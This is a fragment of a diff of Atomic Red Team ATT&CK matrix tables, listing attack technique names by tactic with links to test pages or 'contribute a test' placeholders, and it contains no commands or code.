| | | Login Item [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Web Shell](../../T1100/T1100.md) | [Hidden Files and Directories](../../T1158/T1158.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1063/T1063.md) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | | [Logon Scripts](../../T1037/T1037.md) | | [Hidden Users](../../T1147/T1147.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
|
||||
| | | [Plist Modification](../../T1150/T1150.md) | | [Hidden Window](../../T1143/T1143.md) | | [System Information Discovery](../../T1082/T1082.md) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Network Configuration Discovery](../../T1016/T1016.md) | | | | [Remote Access Tools](../../T1219/T1219.md) | |
|
||||
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Job Scheduling](../../T1168/T1168.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](../../T1148/T1148.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | | Login Item [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1158/T1158.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1063/T1063.md) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | | [Logon Scripts](../../T1037/T1037.md) | | [Hidden Users](../../T1147/T1147.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
|
||||
| | | [Plist Modification](../../T1150/T1150.md) | | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Information Discovery](../../T1082/T1082.md) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Network Configuration Discovery](../../T1016/T1016.md) | | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
|
||||
| | | [Rc.common](../../T1163/T1163.md) | | [Indicator Removal on Host](../../T1070/T1070.md) | | [System Network Connections Discovery](../../T1049/T1049.md) | | | | [Remote File Copy](../../T1105/T1105.md) | |
|
||||
| | | [Re-opened Applications](../../T1164/T1164.md) | | [Install Root Certificate](../../T1130/T1130.md) | | [System Owner/User Discovery](../../T1033/T1033.md) | | | | [Standard Application Layer Protocol](../../T1071/T1071.md) | |
|
||||
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Standard Cryptographic Protocol](../../T1032/T1032.md) | |
|
||||
| | | [Setuid and Setgid](../../T1166/T1166.md) | | [Launchctl](../../T1152/T1152.md) | | | | | | [Standard Non-Application Layer Protocol](../../T1095/T1095.md) | |
|
||||
| | | [Startup Items](../../T1165/T1165.md) | | [Masquerading](../../T1036/T1036.md) | | | | | | [Uncommonly Used Port](../../T1065/T1065.md) | |
|
||||
| | | [Trap](../../T1154/T1154.md) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | [Web Service](../../T1102/T1102.md) | |
|
||||
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
|
||||
| | | [Setuid and Setgid](../../T1166/T1166.md) | | [Launchctl](../../T1152/T1152.md) | | | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
|
||||
| | | [Startup Items](../../T1165/T1165.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Uncommonly Used Port](../../T1065/T1065.md) | |
|
||||
| | | [Trap](../../T1154/T1154.md) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
|
||||
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Plist Modification](../../T1150/T1150.md) | | | | | | | |
|
||||
| | | [Web Shell](../../T1100/T1100.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
|
||||
| | | | | [Process Injection](../../T1055/T1055.md) | | | | | | | |
|
||||
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
|
||||
| | | | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
|
||||
| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
|
||||
| | | | | [Rootkit](../../T1014/T1014.md) | | | | | | | |
|
||||
| | | | | Rootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
|
||||
| | | | | [Scripting](../../T1064/T1064.md) | | | | | | | |
|
||||
| | | | | [Software Packing](../../T1045/T1045.md) | | | | | | | |
|
||||
| | | | | [Space after Filename](../../T1151/T1151.md) | | | | | | | |
|
||||
| | | | | [Timestomp](../../T1099/T1099.md) | | | | | | | |
|
||||
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
|
||||
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
|
||||
| | | | | [Web Service](../../T1102/T1102.md) | | | | | | | |
|
||||
| | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
|
||||
|
||||
@@ -8,7 +8,7 @@
|
||||
| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1103/T1103.md) | [Application Shimming](../../T1138/T1138.md) | [Bypass User Account Control](../../T1088/T1088.md) | [Credential Dumping](../../T1003/T1003.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| [Spearphishing Attachment](../../T1193/T1193.md) | [Control Panel Items](../../T1196/T1196.md) | [Application Shimming](../../T1138/T1138.md) | [Bypass User Account Control](../../T1088/T1088.md) | [CMSTP](../../T1191/T1191.md) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](../../T1132/T1132.md) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1173/T1173.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1038/T1038.md) | [Clear Command History](../../T1146/T1146.md) | [Credentials in Files](../../T1081/T1081.md) | [File and Directory Discovery](../../T1083/T1083.md) | [Logon Scripts](../../T1037/T1037.md) | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials in Registry](../../T1214/T1214.md) | [Network Service Scanning](../../T1046/T1046.md) | [Pass the Hash](../../T1075/T1075.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Execution through API](../../T1106/T1106.md) | [BITS Jobs](../../T1197/T1197.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials in Registry](../../T1214/T1214.md) | [Network Service Scanning](../../T1046/T1046.md) | [Pass the Hash](../../T1075/T1075.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1500/T1500.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | [Pass the Ticket](../../T1097/T1097.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
|
||||
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | [Emond](../../T1519/T1519.md) | [Compiled HTML File](../../T1223/T1223.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Remote Desktop Protocol](../../T1076/T1076.md) | [Email Collection](../../T1114/T1114.md) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1042/T1042.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](../../T1179/T1179.md) | [Password Policy Discovery](../../T1201/T1201.md) | [Remote File Copy](../../T1105/T1105.md) | [Input Capture](../../T1056/T1056.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Resource Hijacking](../../T1496/T1496.md) |
|
||||
|
||||
@@ -2,17 +2,17 @@
|
||||
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|
||||
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
|
||||
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [CMSTP](../../T1191/T1191.md) | [Accessibility Features](../../T1015/T1015.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | [Account Discovery](../../T1087/T1087.md) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
|
||||
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](../../T1059/T1059.md) | [Account Manipulation](../../T1098/T1098.md) | [Accessibility Features](../../T1015/T1015.md) | [BITS Jobs](../../T1197/T1197.md) | [Brute Force](../../T1110/T1110.md) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](../../T1119/T1119.md) | [Data Compressed](../../T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
|
||||
| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1223/T1223.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1009/T1009.md) | [Credential Dumping](../../T1003/T1003.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](../../T1115/T1115.md) | [Data Encrypted](../../T1022/T1022.md) | [Connection Proxy](../../T1090/T1090.md) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1103/T1103.md) | [AppInit DLLs](../../T1103/T1103.md) | [Bypass User Account Control](../../T1088/T1088.md) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](../../T1074/T1074.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command-Line Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | [Accessibility Features](../../T1015/T1015.md) | [BITS Jobs](../../T1197/T1197.md) | [Brute Force](../../T1110/T1110.md) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](../../T1119/T1119.md) | [Data Compressed](../../T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
|
||||
| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1223/T1223.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential Dumping](../../T1003/T1003.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](../../T1115/T1115.md) | [Data Encrypted](../../T1022/T1022.md) | [Connection Proxy](../../T1090/T1090.md) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1103/T1103.md) | [AppInit DLLs](../../T1103/T1103.md) | [Bypass User Account Control](../../T1088/T1088.md) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](../../T1074/T1074.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel Items](../../T1196/T1196.md) | [Application Shimming](../../T1138/T1138.md) | [Application Shimming](../../T1138/T1138.md) | [CMSTP](../../T1191/T1191.md) | [Credentials in Files](../../T1081/T1081.md) | [File and Directory Discovery](../../T1083/T1083.md) | [Logon Scripts](../../T1037/T1037.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| [Spearphishing Attachment](../../T1193/T1193.md) | [Dynamic Data Exchange](../../T1173/T1173.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1088/T1088.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials in Registry](../../T1214/T1214.md) | [Network Service Scanning](../../T1046/T1046.md) | [Pass the Hash](../../T1075/T1075.md) | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](../../T1132/T1132.md) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | [DLL Search Order Hijacking](../../T1038/T1038.md) | [Compile After Delivery](../../T1500/T1500.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | [Pass the Ticket](../../T1097/T1097.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| [Spearphishing Attachment](../../T1193/T1193.md) | [Dynamic Data Exchange](../../T1173/T1173.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1088/T1088.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials in Registry](../../T1214/T1214.md) | Network Service Scanning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1075/T1075.md) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Execution through API](../../T1106/T1106.md) | [BITS Jobs](../../T1197/T1197.md) | [DLL Search Order Hijacking](../../T1038/T1038.md) | [Compile After Delivery](../../T1500/T1500.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | [Pass the Ticket](../../T1097/T1097.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1223/T1223.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Remote Desktop Protocol](../../T1076/T1076.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](../../T1179/T1179.md) | [Password Policy Discovery](../../T1201/T1201.md) | [Remote File Copy](../../T1105/T1105.md) | [Email Collection](../../T1114/T1114.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
|
||||
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1042/T1042.md) | [File System Permissions Weakness](../../T1044/T1044.md) | [Component Object Model Hijacking](../../T1122/T1122.md) | [Input Capture](../../T1056/T1056.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](../../T1056/T1056.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](../../T1118/T1118.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](../../T1179/T1179.md) | [Connection Proxy](../../T1090/T1090.md) | [Input Prompt](../../T1141/T1141.md) | [Permission Groups Discovery](../../T1069/T1069.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Resource Hijacking](../../T1496/T1496.md) |
|
||||
| | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1122/T1122.md) | [Image File Execution Options Injection](../../T1183/T1183.md) | [Control Panel Items](../../T1196/T1196.md) | [Kerberoasting](../../T1208/T1208.md) | [Process Discovery](../../T1057/T1057.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screen Capture](../../T1113/T1113.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](../../T1118/T1118.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](../../T1179/T1179.md) | [Connection Proxy](../../T1090/T1090.md) | [Input Prompt](../../T1141/T1141.md) | [Permission Groups Discovery](../../T1069/T1069.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1122/T1122.md) | [Image File Execution Options Injection](../../T1183/T1183.md) | [Control Panel Items](../../T1196/T1196.md) | [Kerberoasting](../../T1208/T1208.md) | [Process Discovery](../../T1057/T1057.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Screen Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | [Mshta](../../T1170/T1170.md) | [Create Account](../../T1136/T1136.md) | [New Service](../../T1050/T1050.md) | [DCShadow](../../T1207/T1207.md) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](../../T1012/T1012.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
|
||||
| | [PowerShell](../../T1086/T1086.md) | [DLL Search Order Hijacking](../../T1038/T1038.md) | [Parent PID Spoofing](../../T1502/T1502.md) | [DLL Search Order Hijacking](../../T1038/T1038.md) | [Network Sniffing](../../T1040/T1040.md) | [Remote System Discovery](../../T1018/T1018.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
|
||||
| | [Regsvcs/Regasm](../../T1121/T1121.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1073/T1073.md) | [Password Filter DLL](../../T1174/T1174.md) | [Security Software Discovery](../../T1063/T1063.md) | [Windows Admin Shares](../../T1077/T1077.md) | | | [Remote Access Tools](../../T1219/T1219.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
|
||||
@@ -53,7 +53,7 @@
|
||||
| | | | | [Scripting](../../T1064/T1064.md) | | | | | | | |
|
||||
| | | | | [Signed Binary Proxy Execution](../../T1218/T1218.md) | | | | | | | |
|
||||
| | | | | [Signed Script Proxy Execution](../../T1216/T1216.md) | | | | | | | |
|
||||
